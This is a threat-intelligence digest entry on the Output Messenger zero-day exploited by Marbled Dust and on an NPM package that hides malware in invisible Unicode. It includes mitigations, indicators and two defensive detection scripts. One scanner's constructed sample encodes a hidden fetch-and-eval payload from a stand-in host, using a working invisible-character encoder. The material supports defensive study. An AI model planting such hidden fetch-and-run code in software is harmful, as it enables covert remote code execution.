The Good, the Bad and the Ugly in Cybersecurity – Week 20
This intelligence update covers recent cybersecurity events. In positive developments, global authorities disrupted a major botnet, arrested a ransomware actor, and dismantled a dark web marketplace. On the negative side, a malicious NPM package was discovered hiding multi-stage malware using Unicode and Google Calendar. The most concerning development involves cyberspies exploiting a zero-day vulnerability in Output Messenger to target Kurdish military users in Iraq, showcasing increased capabilities of the Marbled Dust threat group.
AI Analysis
Technical Summary
This intelligence update highlights a zero-day vulnerability, CVE-2025-27920, in Output Messenger, an on-premises messaging platform used for internal organisational communications. The flaw is a directory traversal weakness in the server component. It was exploited by Marbled Dust, a known espionage actor, against Kurdish military users in Iraq. The attackers used it to plant malicious binaries named omclientservice.exe and omserverservice.exe on the messaging server and on connected clients; these files are attacker-dropped backdoors, not vulnerable product components, and their presence shows that both sides of a deployment were compromised. The backdoors gave the actor persistent access, command and control, and data exfiltration capability inside the targeted environments, and the campaign demonstrates careful targeting and the capability for long-term compromise.

The update also reports a malicious NPM package that hides multi-stage malware behind invisible Unicode characters and uses Google Calendar to stage later payloads. Such a package is a supply chain risk to any software development environment that installs it, and could lead to infections, data theft or lateral movement within networks, especially in build pipelines that pull NPM dependencies automatically.

Positive developments, namely the disruption of a major botnet, the arrest of a ransomware actor and the dismantling of a dark web marketplace, are also noted, but the Output Messenger zero-day remains the most concerning item because of its targeted nature and potential for persistent espionage. The vendor, Srimax, has released a fixed version of Output Messenger; servers that have not been updated remain exposed. No exploitation beyond the targeted campaign has been reported. The domain api.wordinfos.com is listed as an indicator and is consistent with command and control or malware communication infrastructure.

Overall, this threat represents a compromise of a trusted internal communication platform with significant espionage implications, alongside a separate supply chain risk from the NPM ecosystem.
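The NPM case above turns on code that a reviewer cannot see: a payload encoded as invisible Unicode code points inside an otherwise ordinary string. The following scanner is an added example for this digest, not code from the article or from the malicious package, and it assumes a constructed encoding (two variation selectors per byte) for the sample file; the real package's scheme is not reproduced. The detector itself is generic: it reports any run of invisible code points in a JavaScript source and whether an `eval`-style sink sits on the same line.

```python
"""Detect payloads hidden in invisible Unicode code points inside JavaScript sources.

Added example for this digest; it is not code from the malicious package or from
the original article. The sample file and the nibble-per-variation-selector
encoding below are constructed stand-ins, not the package's real scheme.
"""
import unicodedata

# Code point ranges that render as nothing yet survive copy/paste, minification
# and most diff views.
INVISIBLE_RANGES = [
    (0xFE00, 0xFE0F),      # Variation Selectors
    (0xE0100, 0xE01EF),    # Variation Selectors Supplement
    (0xE000, 0xF8FF),      # Private Use Area
    (0xF0000, 0x10FFFD),   # Supplementary Private Use Areas
    (0x200B, 0x200F),      # zero-width space/joiners, bidi marks
    (0x2060, 0x2064),      # word joiner, invisible operators
    (0xFEFF, 0xFEFF),      # byte order mark appearing mid-file
]


def is_invisible(ch: str) -> bool:
    """True for code points a reviewer would not see in an editor."""
    cp = ord(ch)
    if any(lo <= cp <= hi for lo, hi in INVISIBLE_RANGES):
        return True
    return unicodedata.category(ch) == "Cf"   # other format characters


def hide_bytes(data: bytes) -> str:
    """Constructed encoder: two variation selectors per byte (high nibble, low nibble)."""
    return "".join(chr(0xFE00 + (b >> 4)) + chr(0xFE00 + (b & 0x0F)) for b in data)


def recover_bytes(run: str) -> bytes:
    """Inverse of hide_bytes; only meaningful for runs produced by that scheme."""
    nibbles = [ord(c) - 0xFE00 for c in run]
    return bytes((nibbles[i] << 4) | nibbles[i + 1] for i in range(0, len(nibbles) - 1, 2))


SINKS = ("eval(", "Function(", "atob(", "child_process")


def find_hidden_runs(source: str, min_run: int = 4) -> list[dict]:
    """Report every run of >= min_run consecutive invisible code points, per line."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        i = 0
        while i < len(line):
            if not is_invisible(line[i]):
                i += 1
                continue
            j = i
            while j < len(line) and is_invisible(line[j]):
                j += 1
            if j - i >= min_run:
                visible = line[:i] + line[j:]          # what a reviewer actually sees
                findings.append({
                    "line": lineno,
                    "length": j - i,
                    "run": line[i:j],
                    "visible": visible.strip(),
                    "sink_on_line": any(s in visible for s in SINKS),
                })
            i = j
    return findings


# Constructed sample: a benign-looking helper carrying a hidden second stage.
PAYLOAD = b"fetch('https://example.invalid/stage2').then(r=>r.text()).then(eval)"
SAMPLE_JS = f"""
const os = require('os');
function check() {{ return os.platform(); }}
const _ = '|{hide_bytes(PAYLOAD)}|'; eval(decodeHidden(_));
module.exports = {{ check }};
"""

if __name__ == "__main__":
    for f in find_hidden_runs(SAMPLE_JS):
        print(f"line {f['line']}: {f['length']} invisible code points, "
              f"sink on line: {f['sink_on_line']}; visible text: {f['visible']}")
        print("  decoded (constructed scheme):", recover_bytes(f["run"]).decode())
```

Run it over `node_modules` (or over the package tarball before install) and review any line the tool reports; a legitimate package has no reason to carry dozens of consecutive variation selectors or private-use characters inside a string literal, and a decode sink on the same line is a strong signal.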
Potential Impact
For European organisations the direct impact is currently limited, since the observed exploitation targeted Kurdish military users in Iraq. The vulnerability nevertheless represents a latent risk to any European entity running Output Messenger or similar self-hosted messaging servers: a successful compromise exposes internal communications (confidentiality), allows messages and files to be tampered with (integrity), and can disrupt the service (availability). Marbled Dust's demonstrated tradecraft could be redirected at European military, governmental or critical-infrastructure targets with interests in the Middle East or the Kurdish regions. The malicious NPM package is a supply chain risk for European development environments, where it could lead to malware infections, data theft or lateral movement and undermine the integrity of the software being built. The botnet and ransomware disruptions are welcome but do not reduce these risks, which call for continued attention to supply chain security, zero-day monitoring and defence against targeted espionage campaigns.
Mitigation Recommendations
1. Inventory all Output Messenger deployments, confirm each server runs the vendor's fixed release, and hunt for the binaries omclientservice.exe and omserverservice.exe in unexpected locations. They are attacker-dropped backdoors named to blend in with the product, so any hit should be hashed and compared against the vendor's signed components before it is dismissed.
2. Segment the network and enforce strict access controls around communication servers to limit lateral movement after a compromise.
3. Monitor DNS and proxy logs for lookups of api.wordinfos.com and its subdomains, and for other anomalous outbound connections indicative of command and control activity.
4. Deploy endpoint detection and response (EDR) with behavioural analytics to catch multi-stage malware and obfuscated payloads, particularly on developer workstations and build systems that install NPM packages.
5. Enforce code signing and package integrity verification for all third-party dependencies, including NPM packages (lockfiles with integrity hashes, pinned versions, review of install scripts), to limit supply chain compromise.
6. Train users on the phishing and social engineering tactics that could deliver malware.
7. Participate in threat intelligence sharing communities for timely updates on patches and indicators related to CVE-2025-27920 and Marbled Dust activity.
8. Prepare incident response plans for espionage and zero-day exploitation scenarios, including forensic readiness and out-of-band communication procedures, since the compromised messaging platform may be the organisation's normal channel.
9. Consider moving to an alternative communication platform with active patch management if Output Messenger cannot be secured promptly.
10. Audit DNS registrar and resolver configurations regularly; Marbled Dust has a history of DNS hijacking to intercept traffic.
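Recommendations 1 and 3 above come down to matching two indicator types against local telemetry. The script below is an added example for this digest, not code from the original article: the indicator values are the ones the digest lists, while the dnsmasq-style query log format (`query[TYPE] name from ip`), the log lines and the Windows inventory paths are constructed for illustration. It matches domains label-by-label so that a lookalike such as `wordinfos.com.example.net` is not flagged, and it treats a file-name hit as a lead to verify rather than as proof.

```python
"""Hunt for this campaign's indicators in DNS query logs and a host file inventory.

Added example for this digest, not code from the original article. The indicator
values come from the digest; the dnsmasq-style log lines, the inventory paths and
the 'query[TYPE] name from ip' format are constructed for illustration.
"""
import re
from pathlib import PureWindowsPath

C2_DOMAINS = {"api.wordinfos.com"}                                   # digest IoC
SUSPECT_BINARIES = {"omclientservice.exe", "omserverservice.exe"}   # named in the digest

DNS_RE = re.compile(r"query\[(?P<qtype>[A-Z]+)\]\s+(?P<name>\S+)\s+from\s+(?P<src>\S+)")


def domain_matches(name: str, iocs=C2_DOMAINS):
    """Return the matching indicator if name equals it or is a subdomain of it.

    A plain suffix test would also hit 'wordinfos.com.example.net', so the
    comparison is label-aligned: exact match, or ends with '.' + indicator.
    """
    name = name.rstrip(".").lower()
    for ioc in iocs:
        if name == ioc or name.endswith("." + ioc):
            return ioc
    return None


def scan_dns_log(text: str, iocs=C2_DOMAINS) -> list[dict]:
    """Parse query lines and return those resolving an indicator or its subdomains."""
    hits = []
    for line in text.splitlines():
        m = DNS_RE.search(line)
        if m is None:
            continue
        ioc = domain_matches(m["name"], iocs)
        if ioc:
            hits.append({"src": m["src"], "qname": m["name"], "qtype": m["qtype"], "ioc": ioc})
    return hits


def scan_file_inventory(paths, names=SUSPECT_BINARIES) -> list[str]:
    """Flag paths whose file name matches a suspect binary, case-insensitively.

    A name match alone is not proof: the backdoors were named to blend in with
    the product, so every hit needs hash/signature and location review.
    """
    return [p for p in paths if PureWindowsPath(p).name.lower() in names]


# Constructed sample data.
SAMPLE_DNS_LOG = """\
May 18 09:12:01 dns dnsmasq[811]: query[A] update.microsoft.com from 10.20.4.17
May 18 09:12:07 dns dnsmasq[811]: query[A] api.wordinfos.com from 10.20.4.33
May 18 09:12:09 dns dnsmasq[811]: query[TXT] cdn.api.wordinfos.com from 10.20.4.33
May 18 09:12:11 dns dnsmasq[811]: query[A] wordinfos.com.example.net from 10.20.4.50
"""

SAMPLE_FILE_INVENTORY = [
    r"C:\Program Files\Output Messenger Server\OutputMessengerServer.exe",
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\OMServerService.exe",
    r"C:\Users\analyst\AppData\Local\Temp\omclientservice.exe",
]

if __name__ == "__main__":
    for h in scan_dns_log(SAMPLE_DNS_LOG):
        print(f"C2 lookup: {h['src']} -> {h['qname']} ({h['qtype']}) matches {h['ioc']}")
    for p in scan_file_inventory(SAMPLE_FILE_INVENTORY):
        print("suspect binary, review hash/signature:", p)
```

Feed `scan_dns_log` the resolver or proxy export your environment actually produces (adjusting `DNS_RE` to its format) and `scan_file_inventory` a file listing from the messaging server and its clients; the source host of a matching lookup is the first system to isolate and image.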
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Poland, Sweden
Indicators of Compromise
- cve: CVE-2025-27920
- domain: api.wordinfos.com
Technical Details
- Author: AlienVault
- TLP: white
- References: https://www.sentinelone.com/blog/the-good-the-bad-and-the-ugly-in-cybersecurity-week-20-6
- Adversary: Marbled Dust
Threat ID: 682c992c7960f6956616a37b
Added to database: 2025-05-20 15:01:00
Last enriched: 2025-08-06 00:35:07
Last updated: 2025-08-14 08:12:46